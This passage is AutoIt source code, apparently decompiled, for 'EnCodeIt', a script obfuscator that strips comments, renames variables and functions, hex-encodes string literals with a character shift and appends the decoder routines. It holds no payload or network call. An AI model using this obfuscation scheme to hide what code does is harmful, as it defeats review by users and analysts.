$VarFuncSplit = StringSplit($Lines[$i], "(")
$ArrFuncNames[$VarFuncCount] = StringTrimLeft(StringStripWS($VarFuncSplit[1], 8), 4)
EndIf
Next
ReDim $ArrFuncNames[$VarFuncCount + 1]
Return $ArrFuncNames
EndFunc
Func FnAddEnCodeItFuncs($ScriptData, $DivKey)
Local $Var003C = Random(30, 190, 1), $Var003D
Local $VariEnCodeItLevel5Call = FnMake_EnCodeIt_UStr2_Call($DivKey)
Local $Var001D = Fn006E($ScriptData), $Var0040
Fn007F($Var001D)
Sleep($gSleepTime)
Local $Arr0041[UBound($Var001D) ], $Var0040[UBound($Var001D) ]
For $Var004C = 1 To UBound($Var001D) - 1
If StringLen($Var001D[$Var004C]) > 2 And StringLeft($Var001D[$Var004C], 1) = """" And StringRight($Var001D[$Var004C], 1) = """" Then
If StringInStr($Var001D[$Var004C], """""") Then
$Var0040[$Var004C] = StringReplace($Var001D[$Var004C], """""", """")
Else
$Var0040[$Var004C] = $Var001D[$Var004C]
EndIf
ElseIf StringLen($Var001D[$Var004C]) > 2 And StringLeft($Var001D[$Var004C], 1) = "'" And StringRight($Var001D[$Var004C], 1) = "'" Then
If StringInStr($Var001D[$Var004C], "''") Then
$Var0040[$Var004C] = StringReplace($Var001D[$Var004C], "''", "'")
Else
$Var0040[$Var004C] = $Var001D[$Var004C]
EndIf
Else
$Var0040[$Var004C] = $Var001D[$Var004C]
EndIf
$Arr0041[$Var004C] = "iEnCodeItEnS" & $Var004C
$Var003D &= "Global Const $iEnCodeItEnS" & $Var004C & " = " & "_EnCodeIt_UStr(" & "'" & Fn007D($Var0040[$Var004C], $DivKey) & "'" & ", $iEnCodeItLevel5)" & $CRLF
Next
$ScriptData = StringTrimRight($Var003D, StringLen($CRLF)) & $CRLF & $ScriptData
Sleep($gSleepTime)
Fn008B($Var001D, $Arr0041)
Sleep($gSleepTime)
$ScriptData = "Global Const $iEnCodeItLevel5 = " & $VariEnCodeItLevel5Call & $CRLF & $ScriptData
$ScriptData = "Global Const $EnCodeItConstVar = Int(99/3+15*100/4-13^2+81/3-17-245+99/3+15*100/4-13^2+81/3-17)" & $CRLF & $ScriptData
Sleep($gSleepTime)
$ScriptData &= $CRLF & Fn_EnCodeIt_Funcs_Body()
Return $ScriptData
EndFunc
Func Fn006E($Arg00)
Local $Var0043, $Arr0044[2] = ['', False], $Var0045 = False, $Var0046, $Var0047
Local $Var0048 = Fn00AE($ScriptDir & "\EnCodeItInfo\Func.ini", "Funcs")
$Var0043 = Fn00A1($Arg00)
If Not @error Then
$Arg00 = Fn0071($Var0043, $Arg00)
$Arr0044[1] = True
EndIf
For $M845A72266C5B4F29 = 1 To UBound($Var0043, 1) - 1
IniWrite($ScriptDir & "\EnCodeItInfo\FuncReplace.ini", "FunctionReplace", $Var0043[$M845A72266C5B4F29][1], $Var0043[$M845A72266C5B4F29][0])
Next
Local $Var0049, $Var004A
Local $Var004B = StringReplace($Arg00, "''", "ss")
$Var004B = StringReplace($Var004B, """""", "dd")
Local $Var004C = 0, $Var003A = 0, $Var004E, $Var0045
While StringLen($Arg00) > 0
$Var004A = StringInStr($Var004B, "'")
$Var0049 = StringInStr($Var004B, """")
If Not $Var004A And Not $Var0049 Then ExitLoop
If $Var0049 > 0 And ($Var004A > $Var0049 Or $Var004A = 0) Then
$M8DAA72276C5B4F29 = """"
$Arg00 = StringTrimLeft($Arg00, $Var0049 - 1)
$Var004B = StringTrimLeft($Var004B, $Var0049 - 1)
Else
$M8DAA72276C5B4F29 = "'"
$Arg00 = StringTrimLeft($Arg00, $Var004A - 1)
$Var004B = StringTrimLeft($Var004B, $Var004A - 1)
EndIf
$M8D8A722F6C5B5F29 = StringInStr($Var004B, $M8DAA72276C5B4F29, 0, 2)
If $M8D8A722F6C5B5F29 > 0 Then
$Var0046 = StringLeft($Arg00, $M8D8A722F6C5B5F29)
If Not StringInStr(Chr(01) & $Var0047, Chr(01) & $Var0046 & Chr(01), 1) Then
$Var0047 &= $Var0046 & Chr(01)
For $M8D5A722F0CDB4F29 = 1 To $Var0048[0][0]
If $Var0048[$M8D5A722F0CDB4F29][0] = StringTrimRight(StringTrimLeft($Var0046, 1), 1) Then
$Var0045 = True
$Arg00 = StringTrimLeft($Arg00, $M8D8A722F6C5B5F29)
$Var004B = StringTrimLeft($Var004B, $M8D8A722F6C5B5F29)
ExitLoop
EndIf
Next
If Not $Var0045 Then
$Var004E &= $Var0046 & $lf
$Arg00 = StringTrimLeft($Arg00, $M8D8A722F6C5B5F29)
$Var004B = StringTrimLeft($Var004B, $M8D8A722F6C5B5F29)
EndIf
$Var0045 = False
Else
$Arg00 = StringTrimLeft($Arg00, $M8D8A722F6C5B5F29)
$Var004B = StringTrimLeft($Var004B, $M8D8A722F6C5B5F29)
EndIf
Else
ExitLoop
EndIf
WEnd
If $Arr0044[1] Then $Var004E = Fn006F($Var0043, $Var004E)
Return StringSplit(StringTrimRight($Var004E, 1), $lf)
EndFunc
Func Fn006F(ByRef $ArgRef00, $Arg01)
For $Var004C = UBound($ArgRef00) - 1 To 1 Step - 1
$Arg01 = StringReplace($Arg01, $ArgRef00[$Var004C][1], $ArgRef00[$Var004C][0], 0, 1)
Next
Return $Arg01
EndFunc
Func Fn0070($Arg00, $Arg01, $Arg02)
Local $Var0050 = Fn0088($Arg00, "\s" & $Arg01, $Arg02)
If Not @extended And Not IsArray($Var0050) Then Return SetError(1, 0, 0)
Local $Var0051 = "Somethingreallylongandobnoxiousforreplacementof" & StringStripWS($Arg01, 8)
$Var0050 = Fn007C($Var0050, 0)
Local $Arr0052[$Var0050[0] + 1][2]
For $Var004C = 1 To $Var0050[0]
$Arr0052[$Var004C][0] = $Var0050[$Var004C]
$Arr0052[$Var004C][1] = $Var0051 & $Var004C
Next
Return $Arr0052
EndFunc
Func Fn0071(ByRef $ArgRef00, $Arg01)
For $Var004C = 1 To UBound($ArgRef00) - 1
$Arg01 = StringReplace($Arg01, $ArgRef00[$Var004C][0], $ArgRef00[$Var004C][1], 0, 1)
Next
Return $Arg01
EndFunc
Func FnRemoveComments($FileName)
Local $VarLinesFromFile = StringSplit(StringStripCR(FileRead($FileName)), @LF)
Local $I, $Var001D, $VarAposPos, $VarStrPos, $VarCommentPos, $LineFiltered, $VarChar
;Go through all lines in the File
For $I = 1 To UBound($VarLinesFromFile) - 1
If StringLeft(StringStripWS($VarLinesFromFile[$I], 7), 3) = "#cs" Then
Do
$I += 1
Until StringLeft(StringStripWS($VarLinesFromFile[$I], 7), 3) = "#ce" Or $I = $VarLinesFromFile[0]
ContinueLoop
EndIf
If StringLeft(StringStripWS($VarLinesFromFile[$I], 7), 7) = "#region" Or StringLeft(StringStripWS($VarLinesFromFile[$I], 7), 10) = "#endregion" Then ContinueLoop
;Replace "" => dd and '' =>ss
$LineFiltered = StringReplace($VarLinesFromFile[$I], "''", "ss")
;Bug? $LineFiltered = StringReplace($VarLinesFromFile[$I], """""", "dd")
$LineFiltered = StringReplace($LineFiltered, """""", "dd")
$Var0080 = 0
$VarSomePos = 0
While 1
$VarAposPos = StringInStr($LineFiltered, "'")
$VarStrPos = StringInStr($LineFiltered, """")
$VarCommentPos = StringInStr($LineFiltered, ";")
If Not $VarCommentPos Then
$Var0080 = StringLen($VarLinesFromFile[$I]) + 1
ExitLoop
EndIf
$VarSomePos = $VarCommentPos
If $VarAposPos <> 0 And $VarAposPos < $VarSomePos Then $VarSomePos = $VarAposPos
If $VarStrPos <> 0 And $VarStrPos < $VarSomePos Then $VarSomePos = $VarStrPos
$VarChar = StringMid($LineFiltered, $VarSomePos, 1)
$Var0080 += $VarSomePos
If $VarChar = ";" Then ExitLoop
$LineFiltered = StringTrimLeft($LineFiltered, $VarSomePos)
$VarSomePos = StringInStr($LineFiltered, $VarChar)
$LineFiltered = StringTrimLeft($LineFiltered, $VarSomePos)
$Var0080 += $VarSomePos
WEnd
If StringStripWS(StringLeft($VarLinesFromFile[$I], $Var0080 - 1), 7) <> '' Then
$Var001D &= StringLeft($VarLinesFromFile[$I], $Var0080 - 1) & $CRLF
EndIf
Next
Return StringTrimRight($Var001D, StringLen($CRLF))
EndFunc
Func FnRemoveLineBreaks($Arg00)
Local $Lines = StringSplit(StringStripCR($Arg00), $lf)
Local $RetStr, $i, $Var005E, $Var005F, $Var0045, $Var0059
For $i = 1 To UBound($Lines) - 1
If StringMid(StringStripWS($Lines[$i], 8), StringLen(StringStripWS($Lines[$i], 8)), 1) = "_" Then
$Var005F = StringLen($Lines[$i])
While $Var005F > 1
If StringMid($Lines[$i], $Var005F, 1) = "_" And StringMid($Lines[$i], $Var005F - 1, 1) = " " Then
$Var0059 = StringLeft($Lines[$i], $Var005F - 1)
If StringLeft($Var0059, 1) = Chr(32) Or StringLeft($Var0059, 1) = Chr(09) Then
While StringLeft($Var0059, 1) = Chr(32) Or StringLeft($Var0059, 1) = Chr(09)
If StringLeft($Var0059, 1) = Chr(32) Then
$Var0059 = StringTrimLeft($Var0059, 1)
ElseIf StringLeft($Var0059, 1) = Chr(09) Then
$Var0059 = StringTrimLeft($Var0059, StringLen(Chr(09)))
EndIf
WEnd
EndIf
$RetStr &= $Var0059
$Var0045 = True
ExitLoop
EndIf
$Var005F -= 1
WEnd
EndIf
If $Var0045 Then
If StringMid(StringStripWS($Lines[$i + 1], 8), StringLen(StringStripWS($Lines[$i + 1], 8)), 1) = "_" Then ContinueLoop
$i += 1
If StringLeft($Lines[$i], 1) = Chr(32) Or StringLeft($Lines[$i], 1) = Chr(09) Then
While StringLeft($Lines[$i], 1) = Chr(32) Or StringLeft($Lines[$i], 1) = Chr(09)
If StringLeft($Lines[$i], 1) = Chr(32) Then
$Lines[$i] = StringTrimLeft($Lines[$i], 1)
ElseIf StringLeft($Lines[$i], 1) = Chr(09) Then
$Lines[$i] = StringTrimLeft($Lines[$i], StringLen(Chr(09)))
EndIf
WEnd
EndIf
$RetStr &= $Lines[$i] & $CRLF
Else
$RetStr &= $Lines[$i] & $CRLF
EndIf
$Var0045 = False
Next
Return StringTrimRight($RetStr, StringLen($CRLF))
EndFunc
Func Fn0074($Arg00, ByRef $ArgRef01)
$ArgRef01 = StringSplit(StringStripCR(FileRead($Arg00)), $lf)
Return 1
EndFunc
Func FnCompileDecompile($Arg00)
$Arg00 = $Arg00
Local $VarDecompiler = IniRead($ScriptDir & "\EnCodeIt.ini", "Decompiler", "Exe2Aut", '')
Local $VarCompiler = IniRead($ScriptDir & "\EnCodeIt.ini", "Compiler", "Aut2Exe", '')
Local $VarCompiled = $ScriptDir & "\EnCodeItInfo\Compiled."
MsgBox(0,"Executing Compiler with",$VarCompiler & " /in """ & $Arg00 & """ /out """ & $VarCompiled & "exe" & """ /pass ""A""")
RunWait($VarCompiler & " /in """ & $Arg00 & """ /out """ & $VarCompiled & "exe" & """ /pass ""A""")
MsgBox(0,"Executing DeCompiler with",$VarDecompiler & " /in """ & $VarCompiled & "exe" & """ /out """ & $VarCompiled & "au3" & """ /pass ""A""")
RunWait($VarDecompiler & " /in """ & $VarCompiled & "exe" & """ /out """ & $VarCompiled & "au3" & """ /pass ""A""")
FileDelete($VarCompiled & "exe")
EndFunc
Func InitFiles()
; Delete Note: ScriptDir: Directory containing the running script.
If FileExists($ScriptDir & "\EnCodeItInfo\_Revamp191.dll") Then FileDelete($ScriptDir & "\EnCodeItInfo\_Revamp191.dll")
If FileExists($ScriptDir & "\EnCodeItInfo\Tranquill.skf") Then FileDelete($ScriptDir & "\EnCodeItInfo\Tranquill.skf")
; Make 'EnCodeItInfo\' Dir
If Not FileExists($ScriptDir & "\EnCodeItInfo") Then
; mkdir & Move "c:\EnCodeItInfo" -> "E:\test\EnCodeItInfo"
DirCreate($HomeDrive & "\EnCodeItInfo")
FileSetAttrib($HomeDrive & "\EnCodeItInfo", "+H", 1)
DirMove($HomeDrive & "\EnCodeItInfo", $ScriptDir & "\EnCodeItInfo", 1)
EndIf
If Not FileExists($ScriptDir & "\EnCodeItInfo\SkinCrafter.dll") Then FileInstall('C:\Documents and Settings\EnCodeItInfo\SkinCrafter.dll', $ScriptDir & "\EnCodeItInfo\SkinCrafter.dll", 1)
If Not FileExists($ScriptDir & "\EnCodeItInfo\200699.dll") Then FileInstall('C:\Documents and Settings\EnCodeItInfo\200699.dll', $ScriptDir & "\EnCodeItInfo\200699.dll", 1)
; Start Skincrafter
$gVarRetLoadSkinCrafter = LoadSkinCrafter ($ScriptDir & "\EnCodeItInfo\SkinCrafter.dll", $ScriptDir & "\EnCodeItInfo\200699.dll")
; Run Config
; If Not FileExists($ScriptDir & "\EnCodeIt.ini") Then FirstTimeConfig()
;Stupid path name check
; If Not StringInStr($ScriptFullPath, "EnCodeIt 2.0") Then
; MsgBox(16, "Error", "EnCodeIt.exe must be ran from within the EnCodeIt 2.0 folder.")
; Exit
; EndIf
EndFunc
Func FirstTimeConfig()
Local $Var0065, $Var0063, $Var0062, $Okay
$Var0065 = MsgBox(64, "Info:", "Welcome to EnCodeIt for AutoIt.au3 Scripts." & $CR & "Let's just take a few seconds to setup file locations.")
If $Var0065 = 7 Then MsgBox(16, "Error", "GoodBye")
While 1
$Var0063 = FileOpenDialog("Find Aut2Exe", $HomeDrive, "Exe Files (*.*)", 3, "Aut2Exe.exe")
If Not @error Then
MsgBox(64, "Exe2Aut", "Now find the decompiler.")
While 1
$Var0062 = FileOpenDialog("Find Exe2Au3", $HomeDrive, "Exe Files (*.*)", 3, "Exe2Aut.exe")
If @error Then
$Var0065 = MsgBox(20, "Error", "There was an error retrieving the file, Would you like to quit?")
If $Var0065 = 6 Then
MsgBox(64, "Quitting", "GoodBye")
Exit
EndIf
Else
$Okay = 1
ExitLoop
EndIf
WEnd
Else
$Var0065 = MsgBox(20, "Error", "There was an error retrieving the file, Would you like to quit?")
If $Var0065 = 6 Then
MsgBox(64, "Quitting", "GoodBye")
Exit
EndIf
EndIf
If $Okay Then ExitLoop
WEnd
IniWrite($ScriptDir & "\EnCodeIt.ini", "Compiler", "Aut2Exe", FileGetShortName($Var0063))
IniWrite($ScriptDir & "\EnCodeIt.ini", "Decompiler", "Exe2Aut", FileGetShortName($Var0062))
IniWrite($ScriptDir & "\EnCodeIt.ini", "SleepTime", "Sleep", 10)
EndFunc
Func Fn0078($ArgOpt00 = -1)
If $ArgOpt00 <> -1 Then
Local $Var0069 = DllCall("kernel32.dll", "int", "OpenProcess", "int", 0x1F0FFF, "int", False, "int", $ArgOpt00)
Local $Var006A = DllCall($ScriptDir & "\psapi.dll", "int", "EmptyWorkingSet", "long", $Var0069[0])
DllCall("kernel32.dll", "int", "CloseHandle", "int", $Var0069[0])
Else
Local $Var006A = DllCall("psapi.dll", "int", "EmptyWorkingSet", "long", -1)
EndIf
Return $Var006A[0]
EndFunc
Func FnMake_EnCodeIt_UStr2_Call($DivKey)
Local $VarChar
For $i = 1 To StringLen($DivKey)
$VarChar = $VarChar & Chr(Asc(StringMid($DivKey, $i, 1)) + ($gDivKey2 - 11))
Next
Return "_EnCodeIt_UStr2(" & "'" & Fn0081($VarChar) & "'" & ", $EnCodeItConstVar)"
EndFunc
Func FnAddElementToArray(ByRef $ArgRef00, $Arg01)
If Not IsArray($ArgRef00) Then Return SetError(1, 0, 0)
ReDim $ArgRef00[UBound($ArgRef00) + 1]
$ArgRef00[UBound($ArgRef00) - 1] = $Arg01
Return 1
EndFunc
Func Fn007B($Arg00, $Arg01)
If IsArray($Arg00) Then Return Fn007C($Arg00)
If StringRight($Arg00, StringLen($Arg01)) = $Arg01 Then $Arg00 = StringTrimRight($Arg00, StringLen($Arg01))
Local $Var005E = StringSplit(StringStripCR($Arg00), $Arg01), $Var001D, $Lines
For $Var004C = 1 To $Var005E[0]
If StringInStr($Arg01 & $Var001D, $Arg01 & $Var005E[$Var004C] & $Arg01, 1) Or $Var005E[$Var004C] = '' Then ContinueLoop
$Var001D &= $Var005E[$Var004C] & $Arg01
Next
$Lines = StringSplit(StringTrimRight($Var001D, StringLen($Arg01)), $Arg01)
Fn007F($Lines)
Return $Lines
EndFunc
Func Fn007C($Arg00, $ArgOpt01 = 1, $ArgOpt02 = '')
If IsString($Arg00) Then Return Fn007B($Arg00, $ArgOpt02)
If $ArgOpt02 = '' Then $ArgOpt02 = Chr(01)
Local $Var001D, $Lines
For $i = $ArgOpt01 To UBound($Arg00) - 1
If StringInStr($ArgOpt02 & $Var001D, $ArgOpt02 & $Arg00[$i] & $ArgOpt02, 1) Then ContinueLoop
If $Arg00[$i] <> '' Then $Var001D &= $Arg00[$i] & $ArgOpt02
Next
$Lines = StringSplit(StringTrimRight($Var001D, StringLen($ArgOpt02)), $ArgOpt02)
Fn007F($Lines, $ArgOpt01)
Return $Lines
EndFunc
Func Fn007D($Arg00, $Arg01)
Local $Var006C
$Arg00 = StringTrimLeft(StringTrimRight($Arg00, 1), 1)
For $M8D5A722F635B4FB9 = 1 To StringLen($Arg00)
$Var006C = $Var006C & Chr(Asc(StringMid($Arg00, $M8D5A722F635B4FB9, 1)) + $Arg01)
Next
Return Fn0081($Var006C)
EndFunc
Func Fn007E(ByRef $ArgRef00, $Arg01, $ArgOpt02 = 1)
If Not IsArray($ArgRef00) Then Return SetError(1, 0, 0)
Local $Var0073 = UBound($ArgRef00), $Var004C, $Var0075
Local $VarFuncNames[$Var0073], $Var0077 = ($Var0073 - $Arg01)
For $Var004C = $Var0073 - 1 To ($Var0077 + $ArgOpt02) Step - 1
$VarFuncNames[$Var004C] = $ArgRef00[$Var004C - $Var0077]
Next
For $Var0075 = $ArgOpt02 To $Var0077
$VarFuncNames[$Var0075] = $ArgRef00[ ($Var0073 - 1) - ($Var0077 - $Var0075) ]
Next
$ArgRef00 = $VarFuncNames
Return True
EndFunc
Func Fn007F(ByRef $ArgRef00, $ArgOpt01 = 1)
For $Var004C = $ArgOpt01 To UBound($ArgRef00) - 2
Local $Var0078 = $Var004C, $Var0079
For $Var0075 = $Var004C + 1 To UBound($ArgRef00) - 1
If StringLen($ArgRef00[$Var0075]) > StringLen($ArgRef00[$Var0078]) Then $Var0078 = $Var0075
If @error Then SetError(1, 0, False)
Next
If $Var0078 <> $Var004C Then
Local $Var0079 = $ArgRef00[$Var004C]
$ArgRef00[$Var004C] = $ArgRef00[$Var0078]
$ArgRef00[$Var0078] = $Var0079
EndIf
Next
Return True
EndFunc
Func Fn0080($Arg00)
; Return BinaryString("0x" & $Arg00)
Return Binary("0x" & $Arg00)
EndFunc
Func Fn0081($Arg00)
; Return Hex(BinaryString($Arg00))
Return Hex(Binary($Arg00))
EndFunc
Func FnQuit_EnCodeIt()
GUIDelete(HWnd($gVar0187))
DllCall($gVarRetLoadSkinCrafter, "int", "DeInitDecoration")
DllCall($gVarRetLoadSkinCrafter, "int", "RemoveSkin")
DllClose($gVarRetLoadSkinCrafter)
Exit 0
EndFunc
Func Unload_EnCodeIt()
If MsgBox(36, "Exit", "Are you sure you would like to exit EnCodeIt?") = 6 Then
GUIDelete(HWnd($gVar0187))
DllCall($gVarRetLoadSkinCrafter, "int", "DeInitDecoration")
DllCall($gVarRetLoadSkinCrafter, "int", "RemoveSkin")
DllClose($gVarRetLoadSkinCrafter)
FileDelete($ScriptDir & "\EnCodeItInfo\Compiled.au3")
FileDelete($ScriptDir & "\EnCodeItInfo\Text.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\Var.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\Func.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\FuncReplace.ini")
FileDelete($ScriptDir & "\EnCodeItInfo\Backup.bak")
Exit
EndIf
EndFunc
Func Fn0084($Arg00, $ArgOpt01 = 0, $ArgOpt02 = 0)
$ArgOpt01 = StringInStr($Arg00, $ArgOpt01) + StringLen($ArgOpt01)
Return StringMid($Arg00, $ArgOpt01, StringInStr($Arg00, $ArgOpt02) - $ArgOpt01)
EndFunc
Func SplitFileName($FinishedPath, ByRef $ArgRef01, ByRef $ArgRef02, ByRef $ArgRef03, ByRef $ArgRef04)
Local $VarDrive, $Path, $Filename, $Ext, $i, $Var0080, $ArrFileName[5]
;AbsolutePath?
If StringMid($FinishedPath, 2, 1) = ":" Then
$VarDrive = StringLeft($FinishedPath, 2)
$FinishedPath = StringTrimLeft($FinishedPath, 2)
;NetworkPath?
ElseIf StringLeft($FinishedPath, 2) = "\\" Then
$FinishedPath = StringTrimLeft($FinishedPath, 2)
$Var0080 = StringInStr($FinishedPath, "\")
If $Var0080 = 0 Then $Var0080 = StringInStr($FinishedPath, "/")
If $Var0080 = 0 Then
$VarDrive = "\\" & $FinishedPath
$FinishedPath = ""
Else
$VarDrive = "\\" & StringLeft($FinishedPath, $Var0080 - 1)
$FinishedPath = StringTrimLeft($FinishedPath, $Var0080 - 1)
EndIf
EndIf
;split Path & Name.ext
For $i = StringLen($FinishedPath) To 0 Step - 1
If StringMid($FinishedPath, $i, 1) = "\" Or StringMid($FinishedPath, $i, 1) = "/" Then
$Path = StringLeft($FinishedPath, $i)
$Filename = StringRight($FinishedPath, StringLen($FinishedPath) - $i)
ExitLoop
EndIf
Next
If StringLen($Path) = 0 Then $Filename = $FinishedPath
For $i = StringLen($Filename) To 0 Step - 1
If StringMid($Filename, $i, 1) = "." Then
$Ext = StringRight($Filename, StringLen($Filename) - ($i - 1))
$Filename = StringLeft($Filename, $i - 1)
ExitLoop
EndIf
Next
$ArgRef01 = $VarDrive
$ArgRef02 = $Path
$ArgRef03 = $Filename
$ArgRef04 = $Ext
$ArrFileName[1] = $VarDrive
$ArrFileName[2] = $Path
$ArrFileName[3] = $Filename
$ArrFileName[4] = $Ext
Return $ArrFileName
EndFunc
Func FnReplaceVarStrFuncName($Arg00, $ArgOpt01 = 1)
Local $Var0082 = $ScriptDir & "\EnCodeItInfo\", $Var0083
$Arg00 = Fn00AC(Fn00AB(Fn00A5($Arg00)))
Sleep($gSleepTime)
Return $Arg00
EndFunc
Func Fn0087($Arg00, $ArgOpt01 = 1)
Local $Var0082 = $ScriptDir & "\EnCodeItInfo\", $Var0083
FileClose(FileOpen($Var0082 & "1.properties", 2))
$Arg00 = Fn00A5($Arg00)
FileWrite($Var0082 & "1.properties", $Arg00)
Sleep(100)
$Arg00 = Fn00AB(FileRead($Var0082 & "1.properties"))
FileClose(FileOpen($Var0082 & "1.properties", 2))
FileWrite($Var0082 & "1.properties", $Arg00)
Sleep(100)
$Arg00 = Fn00AC(FileRead($Var0082 & "1.properties"))
FileClose(FileOpen($Var0082 & "1.properties", 2))
FileWrite($Var0082 & "1.properties", $Arg00)
$Var0083 &= FileRead($Var0082 & "1.properties")
FileDelete($Var0082 & "1.properties")
Sleep($gSleepTime)
FileClose(FileOpen($Var0082 & "Compiled.au3", 2))
FileWrite($Var0082 & "Compiled.au3", $Var0083)
Return 1
EndFunc
Func Fn0088($Arg00, $Arg01, $Arg02, $ArgOpt03 = 'i')
If $ArgOpt03 <> "i" Then $ArgOpt03 = ''
$Var0027 = StringRegExp ($Arg00, "(?" & $ArgOpt03 & ":" & $Arg01 & ")(.*?)(?" & $ArgOpt03 & ":" & $Arg02 & ")", 3)
If @extended & IsArray($Var0027) Then Return $Var0027
Return SetError(1, 0, 0)
EndFunc
Func FnVarNamesToVar_ini(ByRef $ArgRef00, ByRef $ArgRef01)
Local $Var0086 = Fn00AE($ScriptDir & "\EnCodeItInfo\Var.ini", "Vars")
Local $Var003A, $Var0088 = Fn008C($ArgRef00)
If IsArray($Var0086) And $Var0086[0][0] > 0 Then
For $Var004C = 1 To UBound($ArgRef00) - 1
If Not StringInStr($ArgRef00[$Var004C], "EnCodeIt") Then
$Var003A += 1
$gLogFile_Vars &= " " & StringFormat("% 6d", $Var003A) & ". " & "$" & $ArgRef00[$Var004C] & $Var0088[$Var004C] & StringFormat("% 6d", $Var003A) & ". " & "$" & $ArgRef01[$Var004C] & $CRLF
EndIf
IniWrite($ScriptDir & "\EnCodeItInfo\Var.ini", "Vars", $ArgRef00[$Var004C], $ArgRef01[$Var004C])
For $Var0075 = 1 To $Var0086[0][0]
If $ArgRef00[$Var004C] = $Var0086[$Var0075][1] Then
IniWrite($ScriptDir & "\EnCodeItInfo\Var.ini", "Vars", $Var0086[$Var0075][0], "$" & $ArgRef01[$Var004C])
ExitLoop
EndIf
Next
Next
Else
For $Var004C = 1 To UBound($ArgRef00) - 1
IniWrite($ScriptDir & "\EnCodeItInfo\Var.ini", "Vars", $ArgRef00[$Var004C], $ArgRef01[$Var004C])
If Not StringInStr($ArgRef00[$Var004C], "EnCodeIt") Then
$Var003A += 1
$gLogFile_Vars &= " " & StringFormat("% 6d", $Var003A) & ". " & "$" & $ArgRef00[$Var004C] & $Var0088[$Var004C] & StringFormat("% 6d", $Var003A) & ". " & "$" & $ArgRef01[$Var004C] & $CRLF
EndIf
Next
EndIf
Return 1
EndFunc
Func FnWriteFunc_ini(ByRef $ArgRef00, ByRef $ArgRef01)
Local $Var003A, $Var0088 = Fn008C($ArgRef00)
For $Var004C = 1 To UBound($ArgRef00) - 1
IniWrite($ScriptDir & "\EnCodeItInfo\Func.ini", "Funcs", $ArgRef00[$Var004C], $ArgRef01[$Var004C])
If Not StringInStr($ArgRef00[$Var004C], "_EnCodeIt_") Then
$Var003A += 1
$gLogFile_Functions &= " " & StringFormat("% 6d", $Var003A) & ". " & $ArgRef00[$Var004C] & $Var0088[$Var004C] & StringFormat("% 6d", $Var003A) & ". " & $ArgRef01[$Var004C] & $CRLF
EndIf
Next
Return 1
EndFunc
Func Fn008B(ByRef $ArgRef00, ByRef $ArgRef01)
For $Var004C = 1 To UBound($ArgRef00) - 1
IniWrite($ScriptDir & "\EnCodeItInfo\Text.ini", "Text", $ArgRef01[$Var004C], $ArgRef00[$Var004C])
Next
Return 1
EndFunc
Func Fn008C(ByRef $ArgRef00)
Local $Arr008B[UBound($ArgRef00) ], $Var003A
For $Var004C = 1 To UBound($ArgRef00) - 1
For $Var0075 = 1 To ((12 + StringLen($ArgRef00[1])) - StringLen($ArgRef00[$Var004C]))
$Arr008B[$Var004C] &= Chr(32)
Next
Next
Return $Arr008B
EndFunc
Func FnGetMonthName($Arg00)
Local $ArrMonthNames[13] = ['', "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
Return $ArrMonthNames[$Arg00]
EndFunc
Func FnGetTime()
Local $VarHOUR = @HOUR, $VarMIN = @MIN, $VarAM_PM
If $VarHOUR < 12 Then
If $VarHOUR = 00 Then $VarHOUR = 12
$VarAM_PM = " AM"
Else
If $VarHOUR > 12 Then $VarHOUR -= 12
$VarAM_PM = " PM"
EndIf
Return $VarHOUR & ":" & $VarMIN & $VarAM_PM
EndFunc
Func Fn4ByteRandHex()
Local $Var002A
For $Var004C = 1 To 4
$Var002A &= Hex(Random(0, 2 ^ 16 - 1, 1), 4)
Next
Return $Var002A
EndFunc
Func Fn_EnCodeIt_Funcs_Body()
Return "Func _EnCodeIt_UStr($sEnCodeItFunction, $iEnCodeItLevel3)" & $CRLF & "Local $iEncodeItOutKey" & $CRLF & "$sEnCodeItFunction = _EnCodeIt_OStr($sEnCodeItFunction)" & $CRLF & "For $xEnCodeItCount = 1 to StringLen($sEnCodeItFunction)" & $CRLF & "$iEncodeItOutKey = $iEncodeItOutKey & Chr(Asc(StringMid($sEnCodeItFunction,$xEnCodeItCount,1))-" & "$iEnCodeItLevel3" & ")" & $CRLF & "Next" & $CRLF & "Return $iEncodeItOutKey" & $CRLF & "EndFunc" & $CRLF & "Func _EnCodeIt_OStr($sEnCodeItStrHex)" & $CRLF & "Local $sEnCodeItChar" & $CRLF & "$aEnCodeIt = StringSplit($sEnCodeItStrHex, """")" & $CRLF & "If Mod($aEnCodeIt[0], 2) <> 0 Then Return SetError(1, 0, -1)" & $CRLF & "For $iXEnCodeItCount = 1 To $aEnCodeIt[0]" & $CRLF & "$iEnCodeItOne = $aEnCodeIt[$iXEnCodeItCount]" & $CRLF & "$iXEnCodeItCount += 1" & $CRLF & "$iEnCodeItTwo = $aEnCodeIt[$iXEnCodeItCount]" & $CRLF & "$iEnCodeItDec = Dec($iEnCodeItOne & $iEnCodeItTwo)" & $CRLF & "If @error <> 0 Then Return SetError(1, 0, -1)" & $CRLF & "$iEnCodeItChar = Chr($iEnCodeItDec)" & $CRLF & "$sEnCodeItChar &= $iEnCodeItChar" & $CRLF & "Next" & $CRLF & "Return $sEnCodeItChar" & $CRLF & "EndFunc" & $CRLF & "Func _EnCodeIt_UStr2($sEnCodeItFunction, $EnCodeItConstVar)" & $CRLF & "Local $iEncodeItOutKey" & $CRLF & "$iEnCodeItDiv = " & ($gDivKey2 - 11) & $CRLF & "$sEnCodeItFunction = _EnCodeIt_OStr($sEnCodeItFunction)" & $CRLF & "For $xEnCodeItCount = 1 to StringLen($sEnCodeItFunction)" & $CRLF & "$iEncodeItOutKey &= Chr(Asc(StringMid($sEnCodeItFunction,$xEnCodeItCount,1))-" & "Int($iEnCodeItDiv)" & ")" & $CRLF & "Next" & $CRLF & "Return $iEncodeItOutKey" & $CRLF & "EndFunc"
EndFunc
Func Fn0091($Arg00, $Arg01, $Arg02, $ArgOpt03 = 0)
If $Arg01 <= 0 Then Return SetError(4, 0, 0)
If Not IsString($Arg02) Then Return SetError(6, 0, 0)
If $ArgOpt03 <> 0 And $ArgOpt03 <> 1 Then Return SetError(5, 0, 0)
If Not FileExists($Arg00) Then Return SetError(2, 0, 0)
Local $Var0092 = FileRead($Arg00)
$Var0092 = StringSplit($Var0092, $CRLF, 1)
If UBound($Var0092, 1) < $Arg01 Then Return SetError(1, 0, 0)
Local $Var0093 = FileOpen($Arg00, 2)
If $Var0093 = -1 Then Return SetError(3, 0, 0)
For $M8D5A722F600B4F29 = 1 To UBound($Var0092) - 1
